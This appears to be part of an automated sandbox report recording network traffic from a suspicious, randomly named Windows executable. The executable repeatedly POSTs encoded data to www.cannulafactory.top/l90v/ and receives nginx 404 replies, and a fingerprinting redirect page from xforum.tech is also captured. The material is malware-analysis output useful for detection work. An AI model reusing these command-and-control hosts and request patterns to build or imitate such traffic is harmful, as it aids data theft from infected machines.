                                      Data Ascii: <html><head><title>xforum.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.xforum.tech/647x/?3L9l=FnaXBox54+ag7g5iwmP6lEuaYrNy9xf43eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUph0PYpOGusRgBTCti0+GqRf9NYEJ3M3nIg3s=&kZr0=ht-lElyh&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#ffffff" tex
                                      Aug 26, 2024 18:29:06.991385937 CEST512INData Raw: 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 78 66 6f 72 75 6d 2e 74 65 63 68 2f 36 34 37 78 2f 3f 33 4c 39
                                      Data Ascii: t="#000000"><div style='display: none;'><a href='http://www.xforum.tech/647x/?3L9l=FnaXBox54+ag7g5iwmP6lEuaYrNy9xf43eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUph0PYpOGusRgBTCti0+GqRf9NYEJ3M3nIg3s=&kZr0=ht-lElyh&fp=-3'>Click here to ent


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      25192.168.2.44976318.183.3.45805356C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 26, 2024 18:29:12.293653011 CEST763OUTPOST /l90v/ HTTP/1.1
                                      Host: www.cannulafactory.top
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.cannulafactory.top
                                      Referer: http://www.cannulafactory.top/l90v/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 201
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Data Raw: 33 4c 39 6c 3d 33 37 46 54 39 49 48 44 50 4f 41 4b 66 54 67 75 6c 36 77 7a 79 2f 41 41 76 44 6d 76 72 69 37 37 77 6b 75 79 56 6d 4f 50 59 41 56 45 72 38 37 71 5a 4c 33 57 63 37 34 69 48 30 65 45 62 4a 4b 6e 6a 56 6b 73 58 59 67 6b 50 73 6c 6b 4c 45 6e 33 76 36 44 59 4f 52 6d 61 2f 2f 69 54 52 70 69 58 2f 32 7a 57 6d 75 35 69 61 4f 68 77 44 6e 5a 53 57 50 55 7a 72 77 57 6c 51 6a 77 70 4a 6f 64 42 30 54 6a 2f 6b 31 32 71 7a 38 41 7a 39 66 6d 76 45 46 41 2f 6e 38 67 48 32 59 6e 56 6e 33 65 61 76 55 63 67 44 35 52 6d 37 6d 4b 2b 30 64 56 34 66 58 65 39 6c 47 33 65 43 77 35 48 45 76 6a 6c 53 51 3d 3d
                                      Data Ascii: 3L9l=37FT9IHDPOAKfTgul6wzy/AAvDmvri77wkuyVmOPYAVEr87qZL3Wc74iH0eEbJKnjVksXYgkPslkLEn3v6DYORma//iTRpiX/2zWmu5iaOhwDnZSWPUzrwWlQjwpJodB0Tj/k12qz8Az9fmvEFA/n8gH2YnVn3eavUcgD5Rm7mK+0dV4fXe9lG3eCw5HEvjlSQ==
                                      Aug 26, 2024 18:29:13.210680008 CEST1236INHTTP/1.1 404 Not Found
                                      Server: nginx/1.20.1
                                      Date: Mon, 26 Aug 2024 16:29:13 GMT
                                      Content-Type: text/html
                                      Content-Length: 3971
                                      Connection: close
                                      ETag: "6526681e-f83"
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
                                      Aug 26, 2024 18:29:13.210710049 CEST1236INData Raw: 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                      Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #90
                                      Aug 26, 2024 18:29:13.210721016 CEST448INData Raw: 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 33 3e 54 68 65 20
                                      Data Ascii: ng>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content">
                                      Aug 26, 2024 18:29:13.210752964 CEST1224INData Raw: 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 52 65 64 20 48 61 74 20 45 6e 74 65 72 70 72 69 73 65 20 4c 69 6e 75 78 2e 20 20 49 74 20 69 73 20 6c 6f 63 61 74 65 64 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                      Data Ascii: th Red Hat Enterprise Linux. It is located <tt>/usr/share/nginx/html/404.html</tt></p> <p>You should customize this error page for your own site or edit the <tt>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      26192.168.2.44976418.183.3.45805356C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 26, 2024 18:29:14.831312895 CEST783OUTPOST /l90v/ HTTP/1.1
                                      Host: www.cannulafactory.top
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.cannulafactory.top
                                      Referer: http://www.cannulafactory.top/l90v/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 221
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Data Raw: 33 4c 39 6c 3d 33 37 46 54 39 49 48 44 50 4f 41 4b 65 77 34 75 67 59 59 7a 36 2f 41 44 6c 6a 6d 76 69 43 37 6e 77 6b 79 79 56 6e 4b 66 59 57 6c 45 6f 64 4c 71 4c 61 33 57 5a 37 34 69 50 55 65 42 55 70 4b 73 6a 56 6f 43 58 5a 63 6b 50 6f 4e 6b 4c 41 6a 33 75 4a 62 5a 4f 42 6d 63 79 66 69 52 66 4a 69 58 2f 32 7a 57 6d 75 64 63 61 4f 70 77 41 58 4a 53 55 74 73 77 30 41 57 6d 52 6a 77 70 66 59 64 46 30 54 6a 4a 6b 30 72 4e 7a 2b 6f 7a 39 61 61 76 45 52 63 38 73 38 67 42 70 49 6d 6c 6d 6b 43 53 32 6c 73 78 4b 34 45 43 6b 30 65 34 78 62 45 69 4f 6d 2f 71 33 47 54 74 66 33 77 7a 4a 73 65 73 4a 52 42 47 6c 37 35 76 4b 45 51 73 61 52 63 53 67 2f 32 6e 43 69 41 3d
                                      Data Ascii: 3L9l=37FT9IHDPOAKew4ugYYz6/ADljmviC7nwkyyVnKfYWlEodLqLa3WZ74iPUeBUpKsjVoCXZckPoNkLAj3uJbZOBmcyfiRfJiX/2zWmudcaOpwAXJSUtsw0AWmRjwpfYdF0TjJk0rNz+oz9aavERc8s8gBpImlmkCS2lsxK4ECk0e4xbEiOm/q3GTtf3wzJsesJRBGl75vKEQsaRcSg/2nCiA=
                                      Aug 26, 2024 18:29:15.767393112 CEST1236INHTTP/1.1 404 Not Found
                                      Server: nginx/1.20.1
                                      Date: Mon, 26 Aug 2024 16:29:15 GMT
                                      Content-Type: text/html
                                      Content-Length: 3971
                                      Connection: close
                                      ETag: "6526681e-f83"
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
                                      Aug 26, 2024 18:29:15.767405987 CEST1236INData Raw: 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                      Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #90
                                      Aug 26, 2024 18:29:15.767427921 CEST1236INData Raw: 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 33 3e 54 68 65 20
                                      Data Ascii: ng>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content">
                                      Aug 26, 2024 18:29:15.767441034 CEST436INData Raw: 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 67 69 6e 78 2e 6e 65 74 2f 22 3e 3c 69 6d 67 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 3d 22 6e 67 69 6e 78 2d 6c 6f 67 6f 2e 70 6e 67 22 20 0a 20 20 20 20 20 20 20 20
                                      Data Ascii: a href="http://nginx.net/"><img src="nginx-logo.png" alt="[ Powered by nginx ]" width="121" height="32" /></a> <a href="http://www.redhat.com/"><img


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      27192.168.2.44976518.183.3.45805356C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 26, 2024 18:29:17.381459951 CEST10865OUTPOST /l90v/ HTTP/1.1
                                      Host: www.cannulafactory.top
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.cannulafactory.top
                                      Referer: http://www.cannulafactory.top/l90v/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 10301
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Data Raw: 33 4c 39 6c 3d 33 37 46 54 39 49 48 44 50 4f 41 4b 65 77 34 75 67 59 59 7a 36 2f 41 44 6c 6a 6d 76 69 43 37 6e 77 6b 79 79 56 6e 4b 66 59 56 46 45 72 76 44 71 5a 70 66 57 65 37 34 69 46 30 65 41 55 70 4b 4c 6a 56 77 4f 58 5a 52 54 50 75 4a 6b 4b 6a 72 33 70 34 62 5a 46 42 6d 63 37 2f 69 51 52 70 69 6e 2f 77 53 52 6d 75 74 63 61 4f 70 77 41 52 4e 53 43 76 55 77 76 41 57 6c 51 6a 77 74 4a 6f 63 51 30 51 54 5a 6b 30 2f 33 7a 50 49 7a 39 37 71 76 49 43 30 38 7a 4d 67 44 71 49 6d 39 6d 6b 50 4d 32 68 31 64 4b 34 78 6e 6b 32 43 34 39 2f 39 6e 63 30 33 44 71 6b 66 2b 50 31 45 4c 4f 64 75 71 46 7a 4e 35 67 72 78 46 53 32 5a 50 65 79 35 38 6c 73 2f 69 66 43 2f 30 70 49 64 31 75 51 36 6e 7a 6e 4a 32 75 4f 35 51 45 48 51 33 78 63 49 48 6d 62 46 71 45 6a 4a 78 48 57 67 42 70 4f 6b 65 54 42 57 49 66 35 35 5a 47 71 70 73 53 37 6e 31 31 36 63 59 37 6e 57 72 6d 55 5a 79 32 73 53 42 68 54 78 4b 45 38 46 79 41 74 72 44 31 6d 6f 4f 76 36 6c 77 6c 4f 52 54 4b 36 33 63 4f 6e 4c 69 6d 2f 41 36 4e 38 30 45 58 6b 63 56 4c [TRUNCATED]
                                      Data Ascii: 3L9l=37FT9IHDPOAKew4ugYYz6/ADljmviC7nwkyyVnKfYVFErvDqZpfWe74iF0eAUpKLjVwOXZRTPuJkKjr3p4bZFBmc7/iQRpin/wSRmutcaOpwARNSCvUwvAWlQjwtJocQ0QTZk0/3zPIz97qvIC08zMgDqIm9mkPM2h1dK4xnk2C49/9nc03Dqkf+P1ELOduqFzN5grxFS2ZPey58ls/ifC/0pId1uQ6nznJ2uO5QEHQ3xcIHmbFqEjJxHWgBpOkeTBWIf55ZGqpsS7n116cY7nWrmUZy2sSBhTxKE8FyAtrD1moOv6lwlORTK63cOnLim/A6N80EXkcVLnIoci64tlyqZHnkeIdWiHox20C99XgZPlZYNmgWMPpAVfbkS0lsOHIltWAZfAJmhcXVkmW1zUPHxkA5eqn/5drzxFYy/iKAXkjZk3tTt1mFBORQTEs9m3/qcAYbcrij0Ct8vhfAJK/TRKYPiYgMLqHh3nqGAaX6+It7tQE7ztiBawXSg9EaXrlSh5f2NTYxzXMVTayT1VCuCCFSzM0hnxeU3/Qf+e2NFlltfE39LJW0jUW61/Y+PqyI2tNbyp6FjLjnT4gW+R+RlVicDl5AhxrTZGWCknwEC87pIZPUlX/YhatiTh6fVISFPEVJlPf5tQJCqwCau0rhW+tm3N5fxra1aSbavAALRa1omjf7IwAWscM0eFvOZMpBfLP/w+HY4gdLO5ekcSaoA2ysfLC5CfUaFND+0yHritGyVb52gHodiWHym286j+05o8hcT1CQNWKHcBR0v/OFfdyc6c7codfsPHwuRCFY20gzbRpuqfC3BqxRr5fsBupUgqcNi8ktpcFW12yxA26NaQzM+nuLm1sD5J6ZltCxumgxuIyMQ3it3+e9Wt6GoA0YhXDgkRzxj36sLFzn0t/hSrejnjDg3HLRYet0xTAfE4rzQUBkeq8FP58t02w+AOcJYxDzVdbVVznEdaL+NBSDniIyTjOsWsv1KxEiIhgPz5w [TRUNCATED]
                                      Aug 26, 2024 18:29:18.300373077 CEST1236INHTTP/1.1 404 Not Found
                                      Server: nginx/1.20.1
                                      Date: Mon, 26 Aug 2024 16:29:18 GMT
                                      Content-Type: text/html
                                      Content-Length: 3971
                                      Connection: close
                                      ETag: "6526681e-f83"
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
                                      Aug 26, 2024 18:29:18.300389051 CEST224INData Raw: 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                      Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; ba
                                      Aug 26, 2024 18:29:18.300399065 CEST1236INData Raw: 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 39 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68
                                      Data Ascii: ckground-color: #900; font-size: 1.1em; font-weight: bold; color: #fff; margin: 0; padding: 0.5em; border-bottom: 2px solid #000; }
                                      Aug 26, 2024 18:29:18.300410032 CEST224INData Raw: 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 53 6f 6d 65 74 68 69 6e 67 20 68 61 73 20 74 72 69 67 67 65 72 65 64 20 6d 69 73 73 69 6e 67 20 77 65 62 70 61 67 65
                                      Data Ascii: iv class="content"> <p>Something has triggered missing webpage on your website. This is the default 404 error page for <strong>nginx</strong> that is distributed wi
                                      Aug 26, 2024 18:29:18.539123058 CEST1224INData Raw: 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 52 65 64 20 48 61 74 20 45 6e 74 65 72 70 72 69 73 65 20 4c 69 6e 75 78 2e 20 20 49 74 20 69 73 20 6c 6f 63 61 74 65 64 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                      Data Ascii: th Red Hat Enterprise Linux. It is located <tt>/usr/share/nginx/html/404.html</tt></p> <p>You should customize this error page for your own site or edit the <tt>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      28192.168.2.44976618.183.3.45805356C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 26, 2024 18:29:19.924750090 CEST488OUTGET /l90v/?3L9l=65tz+8+CHtIdUwlLn50vsNwtrDevriXy7kK7USWOBh85j9WcKbCPI7UII3emD6Kks24YSbVOAcNXIRb+3rSlOmC04vqSX9mxzzPTrJ5MFsobFyJ/S8Jm0iQ=&kZr0=ht-lElyh HTTP/1.1
                                      Host: www.cannulafactory.top
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Aug 26, 2024 18:29:20.825329065 CEST1236INHTTP/1.1 404 Not Found
                                      Server: nginx/1.20.1
                                      Date: Mon, 26 Aug 2024 16:29:20 GMT
                                      Content-Type: text/html
                                      Content-Length: 3971
                                      Connection: close
                                      ETag: "6526681e-f83"
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
                                      Aug 26, 2024 18:29:20.825344086 CEST224INData Raw: 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                      Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; ba
                                      Aug 26, 2024 18:29:20.825354099 CEST1236INData Raw: 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 39 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68
                                      Data Ascii: ckground-color: #900; font-size: 1.1em; font-weight: bold; color: #fff; margin: 0; padding: 0.5em; border-bottom: 2px solid #000; }
                                      Aug 26, 2024 18:29:20.825366020 CEST224INData Raw: 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 53 6f 6d 65 74 68 69 6e 67 20 68 61 73 20 74 72 69 67 67 65 72 65 64 20 6d 69 73 73 69 6e 67 20 77 65 62 70 61 67 65
                                      Data Ascii: iv class="content"> <p>Something has triggered missing webpage on your website. This is the default 404 error page for <strong>nginx</strong> that is distributed wi
